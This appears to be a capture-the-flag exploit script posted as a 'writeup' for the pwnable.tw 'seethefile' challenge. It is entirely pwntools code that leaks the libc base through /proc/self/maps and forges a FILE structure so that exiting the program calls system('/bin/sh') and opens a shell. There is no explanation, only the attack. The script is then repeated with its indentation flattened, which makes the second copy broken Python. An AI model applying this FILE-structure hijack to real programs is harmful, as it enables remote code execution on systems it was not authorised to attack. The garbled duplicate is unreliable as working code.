nirohfeld/writeup

## writeup
from pwn import *

main = ELF('./seethefile')
libc = ELF('./libc_32.so.6')
addr = p32(0x8048a37)
filename_addr = p32(0x804B080)
name_addr = p32(0x804B260)

payload = '/bin/sh\x00' + 'C' * 4 + 'D' * 4 + 'E' * 4 + 'F' * 4 + 'G' * 4 + 'H' * 4 + name_addr + 'J' * 4 + 'K' * 4 + "\x00" * 100


def inset_in_offset(payload, offset, length, data):
    payload = payload[:offset] + data + payload[offset+length:]
    return payload

#r = main.process(env={'LD_PRELOAD': libc.path})
r = remote("chall.pwnable.tw",10200)
def open_file(file_name):
        log.info('Opening file %s' % file_name)
        r.sendlineafter(':', '1')
        r.sendlineafter(':', file_name)

def read_file():
        log.info('Reading file')
        r.sendlineafter(':', '2')

def write_file():
        log.info('Writing file')
        r.sendlineafter(':', '3')

def close_file():
        log.info('Closing file')
        r.sendlineafter(':', '4')

def exit_program(name):
        log.info('Exiting program')
        r.sendlineafter(':', '5')
        r.sendlineafter(':', name)

def leak_libc():
    open_file("/proc/self/maps")
    read_file()
    write_file()
    return int(r.recvuntil("----")[-21:-13], 16) + 0x1000

def run():
    r_payload = "\x00" * 500
    raw_input('Press return to start')
    libc_base = leak_libc()
    system_addr = libc_base + libc.symbols['system']
    print "libc base", hex(libc_base)
    r_payload = inset_in_offset(r_payload, 0x20, 4, name_addr)
    bin_sh = "\x80\x80\x80\x80/;bin/sh\x00"
    r_payload = inset_in_offset(r_payload, 0, len(bin_sh), bin_sh)

    r_payload = inset_in_offset(r_payload, 0x94, 4, p32(0x804B260 + 0x100))
    r_payload = inset_in_offset(r_payload, 0x108, 4, p32(system_addr))
    print r_payload.encode("hex")
    exit_program(r_payload)
    r.interactive()


if __name__ == '__main__':
        run()
	from pwn import *

	main = ELF('./seethefile')
	libc = ELF('./libc_32.so.6')
	addr = p32(0x8048a37)
	filename_addr = p32(0x804B080)
	name_addr = p32(0x804B260)

	payload = '/bin/sh\x00' + 'C' * 4 + 'D' * 4 + 'E' * 4 + 'F' * 4 + 'G' * 4 + 'H' * 4 + name_addr + 'J' * 4 + 'K' * 4 + "\x00" * 100


	def inset_in_offset(payload, offset, length, data):
	payload = payload[:offset] + data + payload[offset+length:]
	return payload

	#r = main.process(env={'LD_PRELOAD': libc.path})
	r = remote("chall.pwnable.tw",10200)
	def open_file(file_name):
	log.info('Opening file %s' % file_name)
	r.sendlineafter(':', '1')
	r.sendlineafter(':', file_name)

	def read_file():
	log.info('Reading file')
	r.sendlineafter(':', '2')

	def write_file():
	log.info('Writing file')
	r.sendlineafter(':', '3')

	def close_file():
	log.info('Closing file')
	r.sendlineafter(':', '4')

	def exit_program(name):
	log.info('Exiting program')
	r.sendlineafter(':', '5')
	r.sendlineafter(':', name)

	def leak_libc():
	open_file("/proc/self/maps")
	read_file()
	write_file()
	return int(r.recvuntil("----")[-21:-13], 16) + 0x1000

	def run():
	r_payload = "\x00" * 500
	raw_input('Press return to start')
	libc_base = leak_libc()
	system_addr = libc_base + libc.symbols['system']
	print "libc base", hex(libc_base)
	r_payload = inset_in_offset(r_payload, 0x20, 4, name_addr)
	bin_sh = "\x80\x80\x80\x80/;bin/sh\x00"
	r_payload = inset_in_offset(r_payload, 0, len(bin_sh), bin_sh)

	r_payload = inset_in_offset(r_payload, 0x94, 4, p32(0x804B260 + 0x100))
	r_payload = inset_in_offset(r_payload, 0x108, 4, p32(system_addr))
	print r_payload.encode("hex")
	exit_program(r_payload)
	r.interactive()


	if __name__ == '__main__':
	run()